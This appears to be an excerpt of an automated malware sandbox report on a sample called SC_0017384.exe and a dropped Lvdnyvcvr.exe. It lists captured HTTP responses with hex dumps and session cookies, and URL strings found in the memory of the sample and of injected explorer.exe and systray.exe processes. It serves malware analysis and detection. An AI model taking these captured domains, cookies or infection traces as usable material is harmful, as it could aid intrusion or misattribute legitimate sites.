Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:03 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=9fd82tovui4062jsi2krb883uj; expires=Tue, 21-Mar-2023 09:11:05 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KWaFRMSY0lCpPiDwf8DPuoaa0gu1Sb1Kcm8IfI25sJnbf5w3hc1ru9gPYcFjKOGzU60ooqcsEsBwFrc261uXwRK6O8iqCp6UGCkkqv2DM%2FuJG%2BATv00MSmQZDFv9Z0Mx7Yt4facPX%2F%2BwNWqW6fAZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba46084491e3-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 41 8b d4 40 10 85 ef fe 8a ba ed 65 26 d9 a8 2b 12 e3 80 08 b2 82 88 88 ee bd 92 ae a4 8b a9 74 85 ee ce 66 a3 f8 df a5 33 2e 9b 10 f6 60 9f 52 5d c5 f7 5e d7 23 95 8d bd 9c 5e 00 00 54 96 d0 5c 3e 97 32 72 14 3a 7d c3 8e e0 ab 46 f8 a4 a3 33 55 7e b9 7d 9a 0a 71 5e d7 e9 d4 6a e6 df 9b 9b 74 7a f4 1d bb f2 fa dd ae 33 a0 31 ec ba f2 d5 f5 f0 b0 ef b6 ea 62 59 bc 1c 1e f2 22 bb 81 5b 92 7b 8a dc e0 e1 83 67 94 c3 1d 79 83 0e 0f 01 5d 38 06 f2 dc 6e 09 7f 36 95 2d fe c7 57 52 3e 06 fe 45 e5 eb b7 cf 39 3b 4e c4 9d 8d a5 53 df a3 ec 67 84 1d 1d ed 65 66 4f d9 ba 0b d1 ab eb f6 0e 0d 87 41 70 2e d9 2d b4 5a b4 39 ef 95 26 36 d1 96 6f 6e 9e d7 a8 f2 55 58 55 fe 14 77 95 12 5b 65 6a 8b 5d ec b6 58 f5 87 6d de 3f 2c c1 90 e6 67 1d 01 3d 81 a8 9e d9 75 d0 aa 87 46 47 31 e0 34 42 4d d0 26 58 06 1f 2d 35 67 88 96 00 8d f1 14 02 d4 e8 37 c8 a8 40 2e 8c 7e 61 7a f8 f9 fd 0b 70 80 30 90 08 19 68 d4 7b 6a a2 cc 19 7c 6e 01 45 80 24 10 b4 c8 12 0e 8b 8b 06 dd 86 77 cf 81 23 24 94 d5 fe 9f 5b 8c 8b 05 61 77 86 9a 44 a7 6c b5 a9 d5 13 2b 04 eb a9 7d 7f 65 63 1c ca 3c 9f a6 29 eb d1 70 50 d7 e8 e8 e2 2c ec 1a 15 97 35 da e7 57 a7 bb 45 2a 91 6f 93 54 5a 64 95 e3 e3 d2 2f 9b ae f2 e5 b7 fb 0b 00 00 ff ff 03 00 16 97 a9 87 7d 03 00 00 0d 0a Data Ascii: 1a8A@e&+tf3.`R]^#^T\>2r:}F3U~}q^jtz31bY"[{gy]8n6-WR>E9;NSgefOAp.-Z9&6onUXUw[ej]Xm?,g=uFG14BM&X-5g7@.~azp0h{j|nE$w#$[awDl+}ec<)pP,5WE*oTZd/}
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:05 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=vcue9caqutq1egitp5nphb1rt3; expires=Tue, 21-Mar-2023 09:11:07 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3zhXmDCjpuF5r%2Bb9vkduN0KPsoBeKDzLZNY3uaKncUAAqPX6SkIDrpdCezdg4FjjcIBL%2FNo4lSZYEpqmzFAP2h8MVNRFhOst32YstoJPL4qiU5v6bAiqgArzH4QLWvfQu6cu8Y6vH%2BC8E3DIy%2F6M"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba562b803a8e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 64 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 31 32 70 78 2f 31 2e 35 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6e 67 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 36 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c Data Ascii: 37d<html> <head> <title>Page Not Found</title> <style> body{ margin:0; padding:30px; font:12px/1.5 Helvetica,Arial,Verdana,sans-serif; } h1{ margin:0; font-size:48px; font-weight:normal; line-height:48px; } strong{ display:inline-block; width:65px; } </styl
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e6%2FEJDgHQjcuoYohdj0ra%2F4d26S7I%2F%2Bw3pN85cRgpRzvKvZ8TVLQZ1RwEuiccVevTyJQY4GtfAPWzseKtdfiDGgIup9D4IyI%2FBZWQiByR2tNVx7SRS3S28yavWbxfCbqlw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba77cf4a2c63-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 64 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 51 29 94 08 dc 03 47 83 17 b9 52 1b 1b 7b db 88 bf 47 49 85 c4 75 e6 cd 68 86 6e 9a 97 b5 7d ef 5b 78 b2 cf 1d f4 fb c7 6e bb 86 c5 2d e2 b6 b5 1b c4 c6 36 57 e7 ae aa 11 db dd 82 0d 05 3d 1d 99 82 38 cf 86 f4 a0 47 e1 55 bd 82 5d 54 d8 c4 f3 e0 09 af a2 21 9c 21 fa 88 fe 67 ca 2d f9 1f 13 96 6c 28 b1 0d 02 59 be cf 52 54 3c ec 5f 3b 18 5d 81 21 2a 7c 4d 1c c4 01 34 1c 0a 14 c9 17 c9 15 61 9a 9a 32 1b 72 de 67 29 85 1f 92 fb 0c 02 6f 33 00 4e 61 1c c7 ea 24 ea f4 52 b9 94 a0 8f 59 e1 be 26 fc 0b 18 c2 79 11 e1 fc c4 fc 02 00 00 ff ff 0d 0a Data Ascii: d4LN0Dw)j%hRQ)GR{GIuhn}[xn-6W=8GU]T!!g-l(YRT<_;]!*|M4a2rg)o3Na$RY&y
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j35Ko95Gih9X9oQzlqUwyxDva9uf6%2FviF1QglfgNtSZEGe%2BvokmHM1OjP7qIItQ6rs7MSbtjMUgDnP6CWLGU0vvNzD4P%2BxBg2jK05xN7S4tpFsO4Dhh6v4ufnjsHIFf0bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba87de882c3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 74 61 74 76 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.metatv.app Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 21 Mar 2023 08:11:52 GMTcontent-type: text/html; charset=utf-8content-length: 9503set-cookie: AWSALB=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/set-cookie: AWSALBCORS=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/; SameSite=Noneserver: Apachevary: X-Forwarded-Proto,Accept-Encoding,User-Agentset-cookie: session=fda0h9v5c31k27ncfm8cd5p2ff; path=/; domain=.brunaeleandro.com; secure; SameSite=Nonecontent-encoding: gzipconnection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 5b 73 db c6 96 ee b3 fc 2b da 4c 6d 53 9a 10 20 2e c4 4d 12 ed 72 14 27 e3 94 7c 39 b6 93 7d 66 ab 5c ac 26 d1 24 61 83 00 03 80 ba 24 f1 8f d9 35 0f 53 73 aa e6 e9 d4 79 39 8f c7 7f ec 7c ab 71 21 40 82 12 95 38 79 18 c5 91 80 46 f7 ea 75 5f ab 2f 68 9c 3e fc f6 d5 d9 bb 7f 7b fd 8c cd b3 45 f8 f8 c1 69 fe 87 b1 d3 b9 e0 3e 5d e0 72 21 32 8e e7 d9 52 11 3f af 82 cb 61 e7 2c 8e 32 11 65 ca bb 9b a5 e8 b0 49 7e 37 ec 64 e2 3a eb 13 80 13 36 99 f3 24 15 d9 70 95 4d 15 b7 c3 fa 12 64 18 44 1f 59 22 c2 61 27 9d c7 49 36 59 65 2c 40 e3 0e 9b 27 62 3a ec f4 fb 13 3f 52 78 8a 76 a9 12 8a 19 9f dc a8 13 9e f2 44 9d c4 8b fe 94 5f 52 65 15 bf 9e 5c 0e 0d 09 f3 34 0b b2 50 3c 7e fd f9 9f b3 20 e2 2c fa fc ef 31 13 11 e1 93 70 9f b3 df d8 59 d9 fc b4 9f 57 7d 90 13 13 f1 85 18 76 2e 03 71 b5 04 22 35 12 ae 02 3f 9b 0f 7d 81 be 84 22 6f 7a 2c 88 82 2c e0 a1 92 4e 78 28 86 ba aa 75 1e 3f 78 50 b2 25 87 34 8b e3 59 28 94 34 c8 84 72 29 92 60 1a 4c 78 16 10 69 15 e4 ef 5f 5c 67 8b 6f ff 1e 3c 7d 75 a9 bc 5d 0d 7e f1 94 f4 c7 a7 37 3f fc f0 f2 c7 ef b3 70 7e f3 d3 37 2f 56 df 70 f3 4c 9f fe 9c 4a da a8 87 74 92 04 cb 8c a5 c9 64 d8 21 fe a7 c7 fd fe 38 51 01 4f 24 cb 24 48 85 7a 15 8c 53 62 4a dc 1f f3 28 12 89 fa 21 7d 42 58 3c f7 87 8e 6b 69 9e d0 34 c5 b1 1d 5f 19 98 86 ad 78 96 e1 29 53 cd b7 0c 73 e2 ea a6 33 e9 3c 3e ed e7 9d a0 c3 07 ad fd 89 c5 58 f8 6a 06 49 4f e3 64 21 45 91 17 7d 48 1b ad 4f 1f 2a 0a fb d7 77 2f ce 2d f6 76 1e 2c 18 8f 7c f6 46 a4 cb 38 a2 aa ec f9 33 97 a5 ab 25 b1 9b c5 d3 a2 a2 08 c5 02 c4 a4 b2 f2 42 f8 01 67 3f af c0 3e 91 32 45 79 2c 41 5e 04 53 16 66 68 ce bc f7 Data Ascii: }[s+LmS .Mr'|9}f\&$a$5Ssy9|q!@8yFu_/h>{Ei>]r!2R?a,2eI~7d:6$pMdDY"a'I6Ye,@'b:?RxvD_Re\4P<~ ,1pYW}v.q"5?}"oz,,Nx(u?xP%4Y(4r)`Lxi_\go<}u]~7?p~7/VpLJtd!8QO$$HzSbJ(!}BX<ki4_x)Ss3<>XjIOd!E}HO*w/-v,|F83%Bg?>2Ey,A^Sfh
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCert
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCert
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://instagram.com/casarpontocom
Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
